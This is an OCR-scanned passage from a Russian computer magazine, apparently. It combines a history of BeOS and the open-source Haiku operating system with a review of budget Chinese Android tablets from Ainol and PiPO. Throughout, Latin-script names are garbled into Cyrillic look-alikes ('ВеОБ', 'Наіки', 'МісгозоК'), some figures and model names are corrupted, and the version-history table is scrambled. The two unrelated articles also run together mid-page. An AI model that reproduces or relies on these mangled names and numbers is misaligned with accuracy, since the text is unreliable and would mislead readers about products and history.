В 1998 году первым официальным дистрибью- 
тором ВеОБ стала Місгогіаіа АВ, вслед за ней 
на американском рынке дистрибьютором стала 
фирма бобе БоКѵѵаге, а в Японии и другой 
части Азии НіІасЬі. 

Однако нужно было налаживать контакты 
и заключать партнерские соглашения с про- 
изводителями ПК. Все компании отвечали 
отказом, и немудрено, ведь рынок полностью 
принадлежал МісгозоК. Но все же откликнулся 
один вендор — НіІасЫ ПсІ., согласившийся 
предустановить Ве05 на три своих компьютера 
из серии НіІасЬі Нога Ргіиз. Как только со- 
глашения были подписаны, юристы МісгозоК 
прибыли в НіІасЬі. И дали им понять, что если 
они будут поставлять свои компьютеры с двумя 
операционными системами — ѴѴіпсіоѵѵз и ВеОБ, 
то МісгозоЙ лишит их лицензии на свою 
систему. Это предупреждение получили все 
производители персональных компьютеров. 
Строго говоря, в ОЕМ-соглашении МісговоК 
шла речь о том, что нельзя изменять порядок 
отображения на экране после инициализации 
ВІ05, вплоть до появления надписи «Добро 
пожаловать в ѴѴіпсіоѵѵз 98». Таким образом Ве 
Іпс. лишилась рынка х86. 

В середине ноября 1998 года на выставке 
СОМОЕХ 98 была выпущена ВеОБ 4.0. Добав- 
лена новая библиотека МесІіа Кіі для работы 



с потоковыми медиаданными, добавлена 
возможность чтения и записи с разделов РАТ16 
и РАТ32, увеличена общая производительность 
до 30%, а также аппаратное ускорение Орепбі.. 
Отдельно стоит отметить скорость работы 
Орепбі на ВеОБ: если сравнивать с ѴѴіпсіоѵѵз 95 
и 98, прирост составлял два-три раза. В апре- 
ле 1999 года вышла новая версия ВеОБ 4.5, 
в которой было не так много изменений. Был 
добавлен новый экран загрузки, отображаю- 
щий порядок загрузки компонентов системы, 
обновили панель настроек конфигурации 
звуковых и видеокарт, а также появились 
хранители экрана. В это же время количество 
разработчиков приложений под ВеОБ пере- 
валило отметку в десять тысяч. 



1999-2001: БЫТЬ ЛИШНИМ 



В мае 1999-го Ве Іпс. меняет стратегию разви- 
тия и пытается выйти на рынок ПК для доступа 
в интернет. И выпускает операционную систему 
ВеІА — урезанную версию ВеОБ, в которую 
добавили новый сетевой стек ВОІМЕ (ВеОБ 
Ыеіѵѵогк Біаск), медиапроигрыватель ВеаІ 
РІауег и браузер Орега 4, а также виртуальную 
машину Эаѵа. Система занимала всего 16 Мб 
на жестком диске и требовала всего 16 Мб 
ОЗУ. ВеІА могла бы с успехом применяться 
в веб-планшетах, медиасерверах, хранящих 
различную фото-, аудио- и видеоинформацию, 
миниатюрных ПК, игровых консолях и подоб- 
ном. Множество компаний лицензировали ВеІА 
в 1999 году, среди них была и Сотрац Сотриіег. 
Однако в конце года все эти фирмы отказались 
от лицензирования ВеІА в пользу ѴѴіпсіоѵѵз 
СЕ. МісгозоК снова надавила на поставщиков 
и предоставила выгодные скидки на ѴѴіпсіоѵѵз 
СЕ. Ве Іпс. снова вытеснили с рынка. 

В это же время пользователи ВеОБ вырази- 
ли недовольство тем, что компания не уделяет 
должного внимания системе. Было решено 
открыть исходный код некоторых частей си- 
стемы, так появились ОрепТгаскег (файловый 
менеджер) и ОрепОезкЬаг (панель задач). Тем 
самым дали возможность сообществу про- 



граммистов ВеОБ самим улучшать возможно- 
сти системы. Но исходные коды всей системы 
ВеОБ так и не открыли, так как слишком много 
чужих лицензированных технологий использо- 
валось внутри системы. 

В марте 2000 года выпущено сразу 
две версии системы ВеОБ 5.0 — РегзопаІ 
и Рго1ез5ІопаІ Есііііоп. Первая была бесплат- 
ной, поставлялась в виде инсталлятора и уста- 
навливалась прямо в \Л/і псіоѵѵз, создавая образ 
ВР5 внутри файловой системы РАТ32. Вторая 
была платной и содержала лицензированный 
МРЗ-кодек, проигрыватель РеаІРІауег, виде- 
оэнкодер Іпсіео 5, руководство пользователя 
и техническую поддержку. В первые три меся- 
ца было скачано больше миллиона копий ВеОБ 
РЕ, а также компьютерные журналы помещали 
дистрибутив на свои диски и распространили 
более 6 миллионов копий. 

Но все же финансовое положение Ве Іпс. 
ухудшалось, несмотря на продажи ВеОБ Рго, 
принесшие 480 тысяч долларов. В августе 
2001 года Ве Іпс. объявила об увольнении 
сотрудников и начала искать покупателя. 

И через пару недель РаІт Іпс. приобрела Ве 
Іпс. за 11 миллионов долларов. Позднее РаІт 
использует все наработки ВеОБ и ВеІА в соб- 
ственной системе для КПК РаІтОБ. 



2001-2012: БЫТЬ НАІКІІ 



Летом того же 2001 года Майкл Фипс (МісЬаеІ 
РЫррз), почувствовав, что ВеОБ скоро канет 
в Лету, решился на дело вполне разумное, 
с его точки зрения, а именно воссоздать ВеОБ 
с нуля, но в качестве проекта с открытым ис- 
ходным кодом. Он рассудил, что раз проект от- 
крытый, то он не может принадлежать какому- 
либо человеку или компании, а следовательно, 
система не исчезнет просто потому, что фирма 
обанкротилась или проект покинули основные 
разработчики. Создать операционную систе- 
му — это чрезвычайно тяжелая работа, а если 
еще учесть, что разработчики будут работать 
над ней абсолютно бесплатно, то это покажет- 
ся чем-то фантастическим. 
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Итак, целью было полностью воссоздать 
последний официальный релиз ВеОБ Р5 — 
идея воистину сумасшедшая. Изначально про- 
ект назывался ОрепВеОБ (сокращенно 0В0$), 
но позже путем голосования было решено 
переименовать проект в Наіки. Новое назва- 
ние проекта было выбрано в честь сообще- 
ний об ошибках, которые выводил браузер 
ІѵіеіРовіІіѵе. Они представляли собой японские 
трехстрочные стишки-нескладушки, которые 
называются хайку. 

Благодаря тому что ВеОБ имела модульную 
структуру, была возможность по отдельности 
воссоздать и заменить каждый элемент си- 
стемы, а также попутно тестировать и отлажи- 
вать. Как упоминалось ранее, Ве Іпс. открыла 
такие компоненты, как йезкЬаг и Тгаскег. 
Первый является аналогом панели задач 
в ѴѴіпсІоѵѵз, а второй файловым менеджером. 
Одним из первых компонентов, который был 
заменен, стал хранитель экрана (БсгеепБаѵег 
Кіі). Когда все части нового компонента были 
закончены, Фипс просто заменил его в системе 
ВеОБ и он заработал. Это лишний раз доказало 
разработчикам, что они избрали верный путь 
и таким образом смогут заменить все элемен- 
ты системы. В апреле 2002 года был создан 
прототип АррБегѵег (сервер приложений), 
который отвечает за отрисовку графического 
интерфейса. 

Итак, работа над Наіки шла полным ходом. 

И Майкл Фипс в 2003 году создал неком- 
мерческую организацию Наіки Іпс., которая 
занималась организационной частью проекта. 
Она контролирует развитие проекта, принима- 
ет пожертвования, а также обладает правами 
на торговую марку Наіки, логотип, веб-сайт 
и, конечно же, исходный код. Кстати говоря, 
исходный код распространяется под весьма 
либеральной лицензией МП. Данная лицензия 
разрешает полное использование кода всем 
желающим, даже частным компаниям в ком- 
мерческих целях. 

В конце марта 2005 года в Наіки было за- 
пущено первое самостоятельное графическое 
приложение. К этому моменту Наіки уже не ис- 
пользовала код или бинарные файлы, которые 
бы принадлежали ВеОБ, другими словами — 
она уже стала самостоятельной системой, 
включая сетевой стек и драйверы. Сетевой 
стек был разработан полностью свой, а также 
был создан слой совместимости с сетевым 
стеком РгееВБй. В декабре 2005 года был на- 
нят Аксель Дёрфлер (АхеІ РбгОег) для работы 
над Наіки. Аксель остается одним из основных 
разработчиков системы и по сей день. Тогда 
он работал над загрузкой с Сй, 5МР, АррБегѵег 
и непосредственно ядром системы. Ядром 
системы является слегка модифицированное 
ядро ИеѵѵОБ, которое было написано бывшим 
инженером Ве Іпс. Тревисом Гейзельбрехтом 
(Тгаѵіз беівеІЬгесМ). Также стоит отметить, 
что в отличие от ВеОБ, которая была основана 
на микроядерной архитектуре, Наіки имеет 
гибридное ядро. 

В 2007 году Майкл Фипс заявил, что вынуж- 
ден покинуть проект по семейным обстоятель- 



ствам, и бразды правления Наіки Іпс. перешли 
в другие руки. Во главе стали: Аксель Дёрфлер 
в качестве президента, Бруно Альбукерке 
(Вгипо 6. АІЬириегрие) в качестве вице-пре- 
зидента компании (кстати, Бруно работает 
в боодіе), казначеем был назначен Райан 
Ливенгуд (Руап 1_еаѵепдоосІ), секретарем — 
Матью Мадиа (МаиЬеѵѵ Мабіа), пятым членом 
совета директоров стал Юриас Маккалоу 
(11гіа5 МсСиІІоидЫ. 

В октябре 2007 года был готов к тестиро- 
ванию драйвер АНСІ БАТА. В 2008 году Наіки 
достигла зеН-ИозІіпд'а, то есть систему можно 
было собрать из исходных кодов прямо в самой 
же Наіки. Это событие стало знаковым, так 
как теперь Наіки не зависела от других систем. 
Также в этом году была добавлена поддержка 
ВІиеІооЛі. 




Итак, чем же сегодня нас может удивить 
Наіки? Как минимум, скоростью загрузки: 
даже на компьютерах пятилетней давности 
Наіки загружается с холодного старта за 10-15 
секунд и занимает всего 150 Мб в оперативной 
памяти. 

Наіки довольно быстрая и отзывчивая 
система даже на устаревших компьютерах, 
которые не в силах справиться с перегру- 
женными современными системами. Это 
достигается благодаря тому, что она переняла 
лучшие стороны ВеОБ, а именно максималь- 
ное использование потоков. Обычно вы- 
деляется по потоку на каждое приложение 
плюс дополнительные на пользовательский 
интерфейс. В Наіки вы не увидите сообщения 
«Приложение не отвечает», как в ѴѴіпсІоѵѵз, или 
«пляжный мячик» в 05 X. Интерфейс не под- 



висал в ВеОБ и не подвисает в Наіки. Еще 
одним козырем системы является ее файло- 
вая система, которая похожа на базу данных. 
Она позволяет любому файлу иметь различные 
атрибуты (метаданные). Например, любой 
е-таіі в Наіки хранится со следующими атри- 
бутами: имя и адрес отправителя, тема, имя 
получателя и адрес. Вы можете произвести 
поиск по любому из этих атрибутов. Таким об- 
разом вы сможете организовать музыкальную 
или видеобиблиотеку, а также адресную книгу. 
И вы больше не будете привязаны к какому- 
либо приложению. Все это позволит сделать 
лишь файловая система и файловый менеджер 
Тгаскег. 

Также стоит отметить системные транс- 
ляторы — это интерпретаторы файловых 
форматов. То есть если в системе имеется, до- 
пустим, транслятор ЭРб, то любое приложение 
в системе будет уметь работать с таким типом 
файлов. Наіки является целостной системой, 
с продуманным графическим интерфейсом. 

Все компоненты Наіки изначально спроекти- 
рованы для совместной работы, включая такие 
приложения, как медиапроигрыватель и веб- 
просмотрщик. 

Исходный код выдержан в строгом стиле, 
что оценят разработчики — это позволит им 
быстро освоиться. Разработчик, который напи- 
шет код для Наіки, может быть уверен, что код 
будет работать и вести себя одинаково на всех 
машинах с Наіки. Графический интерфейс 
и сетевой стек «вшиты» в ядро. 

Проект Наіки каждое лето участвует в про- 
грамме боодіе Биттег о{ Сосіе. И каждый год 
оказывается в списке организаций, кото- 
рым выделяют студентов. Возможно, кто-то 
в боодіе неравнодушен к Наіки. В 2012 году 
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65оС оказался особенно успешным для Наіки. 
Система была портирована на архитектуру 
х86_64, и был полностью портирован про- 
ект Ореп^К. Благодаря появлению Заѵа, 
в полку приложений для Наіки прибыло. Стоит 
особенно отметить, что на Наіки наконец-то 
появилось офисное приложение ТЫпкРгее 
(Жісе, которое способно открывать и сохра- 
нять файлы в формате МісгозоП (Жісе. Также 



в данный момент ведется портирование Наіки 
на архитектуру АРМ, а именно на популярный 
мини-компьютер РазрЬеггу Рі. 

В следующем релизе Наіки, скорее всего, 
перейдет в фазу беты. Наіки Р1В1, вероятно, 
будет включать в себя аппаратную поддержку 
30, ведь в данный момент ведется портиро- 
вание ЗаІІіитЗР из 1_іпих. Для этого также 
придется переписать АррБегѵег, чтобы он под- 



держивал аппаратное ускорение. Вдобавок 
стоит ожидать завершения портирования 
всех приложений на архитектуру х86_64. Ну 
и основным новшеством следует выделить 
появление пакетного менеджера, который 
будет не только выполнять функции установки 
приложений, но и будет являться инструмен- 
том обновления системы. Пакетный менеджер 
Наіки будет непохожим на 1_іпих-решения, 
он будет представлять собой нечто среднее 
между линуксовыми пакетными менедже- 
рами и бандлами 0$ X. А именно в иерархию 
файловой системы добавят специальную папку 
раскадез, за которой будет следить специ- 
альный сіаетоп. И если скачать приложение 
в формате Ьркд и положить в эту папку, то оно 
автоматически примонтируется поверх файло- 
вой системы и станет доступно пользователю. 
То есть чтобы установить приложение, будет 
достаточно переместить пакет в эту папку, 
а для удаления — просто его удалить. Также 
планируется написать сіаетоп, который будет 
отслеживать зависимости того или иного паке- 
та и подгружать нужные. Разработка пакетного 
менеджера началась в феврале текущего года, 
наняты два основных разработчика Наіки — 
Инго Вайнхолд (Іпдо ѴѴеіпЬоІсі) и Оливер Тапп 
(ОІіѵег Тарре). Будем надеяться, что раз- 
работчики справятся и Наіки обзаведется 
инструментом автообновления и средством 
установки приложений. Выход беты стоит 
ожидать осенью этого года, после завершения 
очередного 65оС. 

Ну а пока бета-релиз не состоялся, реко- 
мендуем тебе скачать и попробовать послед- 
ний альфа-релиз на реальном железе, ведь 
именно на нем ты сможешь ощутить все преле- 
сти быстродействия и изящности системы. □□ 



ИСТОРИЯ ВЕРСИЙ 

НАІКМ 



Наіки обзавелась компилято- 
ром 6СС4 

Начальная реализация ѴѴі-Рі- 
стека на базе кода РгееВБй. 
Портирован тулкит 01. Под 
Наіки начинают писать ПО. 



Поддержка \Л/і-Рі за счет слоя 
совместимости с РгееВВО. 
Новый нативный веб-браузер 
МеЬРовіІіѵе. 

Инструментарий для локали- 
зации системы І_осаІе Кіі. 
Вышло руководство пользова- 
теля, в том числе и на русском. 
АСРІ-драйвер включен 
по умолчанию. 



Поддержка файловых систем 
ЫТРБ, ехРАТ, ех12/3 и других. 
Улучшены ІО-АРІС, АСРІ, драй- 
веры для принтеров и видео. 
Улучшена поддержка кодеков 
в МегііаКіІ. 

Функция БіаскАпсІТіІе: можно 
объединять окна приложений. 
Расширенная поддержка ло- 
кали, внедрен Р05ІХ Іосаіе АРІ. 
Переход на І_ауоиІ АРІ: интер- 
фейс адаптируется к шрифтам. 
Поддержка РАЕ — теперь до- 
ступно больше 4 гигабайт ОЗУ. 



Собственный дебаггер под на- 
званием йеЬиддег вместо дсіЬ. 
ВР5 стала быстрее. Улучшена 
поддержка ІЧТР5 и Віи-Рау. 
Улучшенные 115В ОНСІ драйве- 
ры, определение СРІІ. 
Добавлен переключатель рас- 
кладок. 

Добавлен эквалайзер и за- 
грузчик Ѵ5Т-плагинов. 
Улучшены драйверы сетевых 
карт. Базовая поддержка ІРѵб. 
Поддержка большинства карт 
Расіеоп Нй. 

Добавлена поддержка ѴѴРА/ 
ѴѴРА2. 

Исправлено более 1000 оши- 
бок с момента выхода Р1АЗ. 



Р1А1 



Р1А2 



Р1АЗ 



Р1А4 



14 сентября 2009 года 



10 мая 2010 года 



20 июня 2011 года 



12 ноября 2012 года 
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ВЫБИРАЕМ НЕДОРОГОЙ 
КАЧЕСТВЕННЫЙ ПЛАНШЕТ 
КИТАЙСКОГО ПРОИЗВОДСТВА 

Китайские продукты принято приравнивать к дешевому 
низкокачественному ширпотребу, который годится только 
для одноразового использования. Тем не менее китайцы уже 
давно занимаются производством электроники для многих 
именитых фирм, что позволило им набить руку и научиться- 
таки делать вещи хоть и не Ні-ЕпсІ, но достаточно высокого 
качества. В этом обзоре мы поговорим о недорогих китай- 
ских планшетах, которые действительно достойны внимания. 



ІРАР ЗА 50 ДОЛЛАРОВ, ГОВОРИТЕ? 



Рынок планшетов в Китае очень широк. Их 
клепают все, кому не лень, а внутрь засовы- 
вают все, что только можно, включая БоС'и, 
разработанные для роутеров. Цены начинаются 
примерно с 50 долларов, однако все, что стоит 
меньше 80 зеленых, годится разве что для ис- 
пользования в качестве подноса. В боль- 
шинстве своем это низкопроизводительный 
процессор МІР5 (уже начали ставить АВМ'ы), 
512 Мб (иногда даже 1024 Мб) низкоскоростной 
дешевой памяти, 4-8 Гб внутренней памяти, 
две трети из которых — это впаянная внутрь 
дешевая медленная флешка, убогий модуль 
ѴѴі-Рі, ну и, конечно же, ужасный экран, читать 



с которого — насилие над зрением. Всего этого 
попате-шлака в нашем обзоре, к счастью, 
не будет. 

Доплатив 30-50 долларов, уже можно 
рассчитывать на что-то более-менее сносное 
на двухъядерном процессоре, с гигабайтом па- 
мяти, с достаточно качественным 7-дюймовым 
экраном и логотипом какой-никакой, а фирмы. 
Абсолютным лидером среди производителей 
таких планшетов является компания АіпоІ, 
а также менее известные китайские «бренды», 
такие как Опба, Раппоз и СиЬе. В большинстве 
своем они делают действительно добротные 
продукты, которые вполне можно использовать 
повседневно, но не в качестве полноценной за- 



мены планшету именитой фирмы (баги и ошиб- 
ки во внутреннем дизайне достаточно частое 
явление, особенно для молодых фирм). 

Цены на 10-дюймовые модели с качествен- 
ными ІРБ-матрицами и АпсігоісІ 4.1 на борту 
начинаются примерно с 200 долларов, за кото- 
рые ты получишь двух- или четырехъядерный 
процессор, 1-2 Гб памяти, 16-32 Гб внутрен- 
ней памяти и хорошее качество исполнения. 
Правят на этом рынке все те же компании, 
и некоторые из них готовы предложить продукт 
качества если не равного, то довольно близ- 
кого к планшетам известных брендов. Другое 
дело, что среди хлама качественную модель 
еще нужно найти. 



АІЫ0І_Ы0Ѵ0 7^^^И 
І_ЕСЕШСРѴ5ТАІ_/РІ_АМЕ 



Компания АіпоІ (. . .ѵ.аіп оі.сот ) уже давно 
зарекомендовала себя как производитель 
качественных, но при этом дешевых план- 
шетов на базе АпсігоісІ. Основная линейка ее 
устройств носит имя Ыоѵо 7 и включает в себя 
несколько 7-дюймовых моделей, цена которых 
варьируется от 80 до 150 зеленых президентов, 
в зависимости от начинки и дисплея. Замеча- 
тельная черта всех этих планшетов — популяр- 
ность, благодаря которой для них можно найти 
множество прошивок, включая СуаподепМоб 
последних версий. Наиболее интересные 
на сегодняшний день модели — это 1_едепсІ, 
Сгузіаі и Нате, все с АпсігоісІ 4 на борту. 

ІЧоѵо 7 1_едепсі — бюджетная модель стоимо- 
стью около 80 долларов. Несмотря на цену, об- 
ладает достаточно хорошими характеристика- 
ми, включая процессор на 1 ГГц, 6РІІ МаІі-400 
(БоС АІІѵѵіппег А13), 512 Мб РАМ, 8 Гб внутрен- 
ней ІМАМО-памяти, и ТРТ-экраном с разреше- 
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нием 800 * 600. Три самых слабых места план- 
шета — это количество оперативной памяти, 
которой будет явно недостаточно для активной 
работы с Апбгоіб 4.0.4, экран, хоть и не убогий, 
но с плохой цветопередачей и мизерными 
углами обзора в 120 градусов, а также батарея 
всего на 3000 мА • ч (около трех-четырех часов 
автономной работы). Тем не менее в планшет 
установлен производительный графический 
ускоритель, а также фронтальная камера 
на 0,3 Мп, чего в совокупности будет достаточ- 
но для просмотра фильмов, средних игр Юеаб 
Брасе, например) и общения в Бкуре. 

Из особенностей планшета можно отметить, 
как всегда у АіпоІ, хорошую сборку, а также 
поддержку режима ІІБВ-хост, что позволя- 
ет подключать к нему любые ІІБВ-девайсы, 
включая клавиатуру, мышь, модем и флешку 
(причем на уровне ОС имеется поддержка 
ехРаІ и ЫТРБ). Странно, что соотношение 
сторон экрана 4:3, а не 16:9, как у большинства 
других планшетов. НОМІ-выхода нет. Обилия 
сторонних прошивок пока тоже не наблюдает- 
ся, что можно объяснить свежестью модели, 
которая появилась совсем недавно как замена 
ІМоѵо 7 Раіабіп на базе процессора МІР5. 

ІМоѵо 7 Сгузіаі — своего рода тібсііе-гапде 
среди 7-дюймовых моделей АіпоІ, пришедшая 
на смену моделям ЕК II и Аигога. При цене в 120 
долларов планшет обладает двухъядерным 
процессором на 1,5 ГГц (БоС Атіодіс 8726-М6), 
6Р11 МаІі-400МР2, 1 Гб ОРРЗ, 8 Гб ІМАІМО- 
памяти и фронтальной камерой на 2 Мп, чего 
более чем достаточно для комфортной работы 
с прошитой по умолчанию Апбгоіб 4.1. Дисплей 
имеет нормальное соотношение сторон 16:9, 
разрешение 1024 * 768, а главное — основан 
на технологии МѴА, которая хоть и уступает 
ІР5, но зато значительно превосходит обычные 
ТІМ-матрицы по таким параметрам, как кон- 
трастность и углы обзора. Другими словами, 
экран у Сгузіаі хорош, имеет прекрасную цвето- 
передачу и совсем незначительное затемнение 
картинки при взгляде под углом 170 градусов. 

Во всем остальном все стандартно: хоро- 
шая сборка, поддержка ІІБВ-хоста, а также 
НОМІ, вес 328 г, толщина 11,2 мм. Аккумулятор 
на 3700 мА • ч обеспечивает до пяти-шести 
часов работы. Главный недостаток — пла- 
стиковый корпус, который достаточно сильно 
греется во время больших нагрузок и при за- 
рядке. Несмотря на молодость модели, для нее 
уже существуют прошивки на базе АОКР 
и СуаподепМоЬ ( . ѵ\ѵѵ/.5Іа{ебгоісІ.сотЛогит/400- 
аіпоІ-поѵо-7-сгѵ5ІаІ) . 

ІМоѵо 7 Нате — настоящий венец китайско- 
го планшетотворения. По сути, это все тот же 
Сгувіаі, однако в качестве дисплея в нем уста- 
новлена качественная ІРБ-матрица с разреше- 
нием 1280 х 800, которая обеспечивает четкую 
и контрастную картинку с замечательной цве- 
топередачей и глубоким черным цветом. За та- 
кое удовольствие придется доплатить при- 
мерно 30-40 долларов к цене Сгузіаі. Во всем 
остальном начинка почти полностью совпадает 
с Сгузіаі, за исключением того, что по умолча- 
нию здесь почему-то предустановлена версия 



АіпоІЫоѵо7Сгу$ІаІ 

Апбгоісі 4.0.4 (с официальным обновлением 
до 4.1), а также появился ВІиеІооіЬ версии 2.1, 
которого нет ни в І_едепб, ни в более младшей 
модели. Емкость батареи также была увеличе- 
на до 5000 мА • ч, что позволяет использовать 
устройство в течение восьми часов при средних 
нагрузках. Если говорить о внешнем оформ- 
лении и качестве сборки, то эти показатели 
великолепны и по ним ІМоѵо 7 Нате превос- 
ходит обе младшие модели. Корпус практи- 
чески монолитен и не издает скрипов даже 
при «скручивании». Задняя крышка выполнена 
из алюминия, который обеспечивает хороший 
отвод тепла. 

Примечательно, что планшет имеет и другое 
название — Еіге, однако последний предназна- 
чен для китайского рынка и распространяется 
в коробке, оформленной на китайском языке, 
и без кабеля НЮМІ и 0Т6-кабеля в комплекте. 
Это следует учесть при покупке, так же как и то, 
что самые ранние партии планшетов осна- 
щались дисплеем, который... издавал свист 
(впрочем, этот недостаток можно устранить 
хирургическим путем). 

Из других проблем планшетов АіпоІ (а про- 
блемы, если производитель китайский, есть 
всегда) стоит отметить брак сенсорной панели, 
который проявляется примерно в 1% случаев 
и пока не может быть устранен, а также «ис- 
чезновение» участков внутренней памяти. 

Эти и более мелкие программные недочеты 
планшета наблюдаются у всех моделей АіпоІ, 
однако почти со всеми из них можно справить- 
ся, используя различные программные хаки 
либо перепрошивкой устройства. Единствен- 
ная еще не побежденная проблема — это брак 
сенсорной панели. В этом случае планшет мож- 
но по гарантии отправить обратно в интернет- 
магазин, и его без проблем поменяют на новый. 



АІІМОІ. ІМОѴО 10 НЕРО 



Долгое время АіпоІ упорно занималась произ- 
водством только 7-дюймовых моделей план- 
шетов, поэтому недавний выход модели Него 
с экраном 10,1 дюйма стал событием давно 



ожидаемым, а для некоторых ценителей даже 
знаковым. Но и в этот раз планшет оказался 
неоднозначным. При хорошей начинке, сборке 
и экране он до сих пор страдает от проблем 
своих предшественников, а также некоторых 
новых. Но обо всем по порядку. 

Строго говоря, КІоѵо 10 Него — это все тот 
же Нате, но более крупных размеров. Внутрь 
установлен все тот же БоС Атіодіс 8726-М6 
с двухъядерным процессором на 1,5 ГГц, 
чипы памяти РОВЗ на 1 Гб, 16 Гб постоянной 
МАМб-памяти, модули ѴѴі-Рі и ВІиеІооіЬ, датчик 
положения. Задняя крышка опять же выпол- 
нена из алюминия. Вся разница заключается 
в размере экрана и емкости батареи. 

Экран у Него имеет размер 10,1 дюйма 
при соотношении сторон 16:10. При этом, не- 
смотря на размер, разрешение у него осталось 
прежним, то есть 1280 * 800, что, впрочем, 
никак не влияет на читаемость и другие 
параметры; картинка сочная, четкая и почти 
не зернистая. ІРБ-матрица ничем не хуже, чем 
у Ріге, хорошие углы обзора с практически пол- 
ным сохранением цветопередачи при взгляде 
под углом (картинка просто немного тускнеет). 
При любом виде деятельности картинка сохра- 
няет четкость и качество цветопередачи, а про- 
сматривать сайты или смотреть видео на таком 
большом экране — одно удовольствие. 

Вторая отличительная черта планшета — 
батарея емкостью аж 8000 мА • ч. Она способна 
обеспечить примерно десять часов работы 
при средних нагрузках — это очень и очень хо- 
роший результат. Производитель, кстати, заяв- 
ляет о семи часах работы при просмотре видео 
и пятнадцати — при прослушивании музыки, 
во что можно легко поверить. В общем, батареи 
легко хватает для того, чтобы использовать 
планшет самыми разными способами прак- 
тически весь день и при этом не волноваться 
об установке на зарядку. Идеальный девайс 
для любого гика. 

Из других особенностей можно отметить два 
стереодинамика, выдающих достаточно каче- 
ственный и громкий для пищалок звук, а также 
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наличие ВІиеІооіЬ. В остальном все стандар- 
тно: слот тісгоБО, порт НЮМІ, поддержка 115В- 
0Т6. Дизайн выше всяких похвал, он кажется 
простым, но при этом обладает своим стилем, 
который придает планшету шарм серьезных 
брендов. Размеры также некрупные, планшет 
шире Батзипд баіаху ТаЬ 10.1 на 1 мм и длин- 
нее на 3 мм. 

Теперь о недостатках. Оказалось, что при 
всем внешнем блеске само качество испол- 
нения и сборка оставляют желать лучшего. 
Например, многие пользователи отмечают 
просто-таки непозволительное расхожде- 
ние в стыковке, а также в некоторых случаях 
слишком перетянутые болты крепления 
экрана, которые приводят к засветам. Про- 
блемы проявляются не так часто, но имеют 
место быть. Кроме того, можно отметить все те 
же фирменные баги АіпоІ, включая отваливаю- 
щуюся внутреннюю память, глюки с тачпадом 
и некоторые другие баги. К счастью, все они 
могут быть вылечены программно, поэтому осо- 
бо волноваться не стоит. Например, проблемы 
с полным выходом из строя тач-панели здесь 
уже нет. 



РІРО М2/МЗ ЗС 



Компания РіРО [ ѵтѵѵ.ріро.сот.сп і не так широ- 
ко известна в России, как АіпоІ, но ей опреде- 
ленно следует выделить место под солнцем. 
Планшеты РіРО могут похвастаться отличным 
качеством исполнения, сборки и программной 
начинки, имея при этом совсем невысокую 
цену. В арсенале компании уже более двадцати 
планшетов с разными размерами экранов 
и начинкой, и все они, что интересно, отлича- 
ются не столько хорошим качеством, сколько 
отсутствием по-настоящему серьезных неизле- 



РіРО М3, заказанный мной в китайском магазине 



чимых багов и вниманием к качеству комплек- 
тующих. А это один из основных аргументов 
при выборе «китайца». 

В этом обзоре я хотел бы остановиться толь- 
ко на двух моделях компании: 9,7-дюймовом 
М2 с соотношением сторон 4:3 и 10,1-дюймовом 
М3 с «классическим» соотношением сторон 
16:10. Оба планшета оснащены превосходными 
Бирег ІР5 матрицами производства НаппБіаг 
и имеют версии с 36-модулем и без. Своего 
рода выбор на любой вкус и цвет, тем более 
что 7-дюймовые модели, такие как, например, 
111, качеством исполнения и комплектующих 
практически не отличаются. 

Сразу оговорюсь, что оба планшета постро- 
ены на одной и той же платформе и отличаются 
только размерами экранов и дизайном. Оба 
основаны на БоС ВосксЫр ВК3066, с двумя 
процессорными ядрами Сог1ех-А9 на 1,6 ГГц, 
четырьмя ядрами 6РІІ МаІі-400МР4 на 300 МГц 
(стоит сказать, что данный БоС производитель- 
нее любого, используемого в АіпоІ), гигабайтом 
памяти и 16 Гб внутренней МАШ-памяти (часть 
которой — это обычная флеш-память, но это 
проблема всех «китайцев»). Оба оснащены дат- 
чиками освещенности и положения, оба под- 
держивают ВІиеІооіЬ, ѴѴі-Рі, а также 36, если 
ты готов переплатить 40 баксов за соответству- 
ющую модель. В качестве внешних выходов 
здесь есть два тіпіІІБВ-порта, один из которых 
поддерживает 0Т6, а также тіпіНОМІ-выход 
и слот для карт памяти. Также оба оснащены 
хорошими стереодинамиками. 

Отличие моделей заключается, как я уже 
сказал, в размерах экранов. В М2 установлен 
экран на 9,7 дюйма со стандартнейшим разре- 
шением 1024 х 768 (то есть плотность пикселей 
здесь почти в два раза выше, чем на 17-дюймо- 



вом мониторе), тогда как у М3 — 10,1 с разреше- 
нием 1280 х 800. Разница эта выливается в два 
простых факта. Во-первых, получается, что у М3 
плотность пикселей выше, поэтому со стандарт- 
ного расстояния, на котором ты будешь держать 
планшет, ты почти не заметишь «лесенок», тог- 
да как в М2 этот эффект все же есть. Во-вторых, 
у М2 соотношение сторон 4:3, а это значит, 
что его удобнее всего использовать для веб- 
серфинга и других подобных задач, тогда 
как на М3 гораздо удобнее смотреть фильмы. 

Особо следует отметить само качество 
дисплея обеих моделей. Это отличная Бирег 
ІР5 матрица с практически неограниченными 
углами обзора, без всякого ухода в затемнение, 
с очень высокой яркостью, контрастностью 
и насыщенными цветами. Работать с планше- 
том, имеющим такой экран, — одно удоволь- 
ствие, он не засвечивается на солнце и обе- 
спечивает превосходное качество картинки 
при просмотре НШ-фильмов. 

Качество сборки также на высоте, панели 
аккуратно подогнаны друг под друга, а для зад- 
ней стенки использован алюминий, в сторону 
которого обращен сам БоС, так что с теплоот- 
водом тут все в порядке. В качестве батареи 
здесь использованы две 3,7-вольтовые батареи 
емкостью 3500 мА • ч, соединенные последо- 
вательно, так что итоговая емкость состав- 
ляет 7000 мА • ч. Причем последовательное 
соединение дает в результате напряжение 
в 7,4 В, поэтому в качестве зарядника исполь- 
зуется 9-вольтовый блок питания с током 2,5 А, 
который заряжает планшет с нуля за каких-то 
два часа. 

Слишком уж хорошо для планшета за 200 
долларов, не правда ли? Действительно, 
как и всегда бывает с «китайцами», в любой, 
даже самой большой и красивой бочке меда 
есть ложка дегтя. К счастью, проблем всего 
несколько, и все их можно вылечить, правда, 
для этого придется лезть внутрь. Первая 
серьезная проблема — это засветы. У кого- 
то их больше, у кого-то нет совсем. Видимо, 
все зависит от китайца, который занимался 
сборкой. Решается проблема осторожным под- 
кручиванием болтов, крепящих экран. Вторая 
проблема — это смерть тач-панели через 
некоторое время после начала использования. 
Появляется она у небольшого числа юзеров 
и может быть вылечена впаиванием диода 
стоимостью один рубль между контактами тач- 
панели. Руководство есть в интернете, но, если 
руки кривые, любой радиомастер сделает это 
за символическую бутылку водки. Ходят слухи, 
что в новых партиях все уже исправлено. Третья 
проблема — плохой прием ѴѴі-Рі-сигнала. Это 
типичнейшая для «китайцев» бага, и она всег- 
да лечится переклейкой антенны ближе к краю 
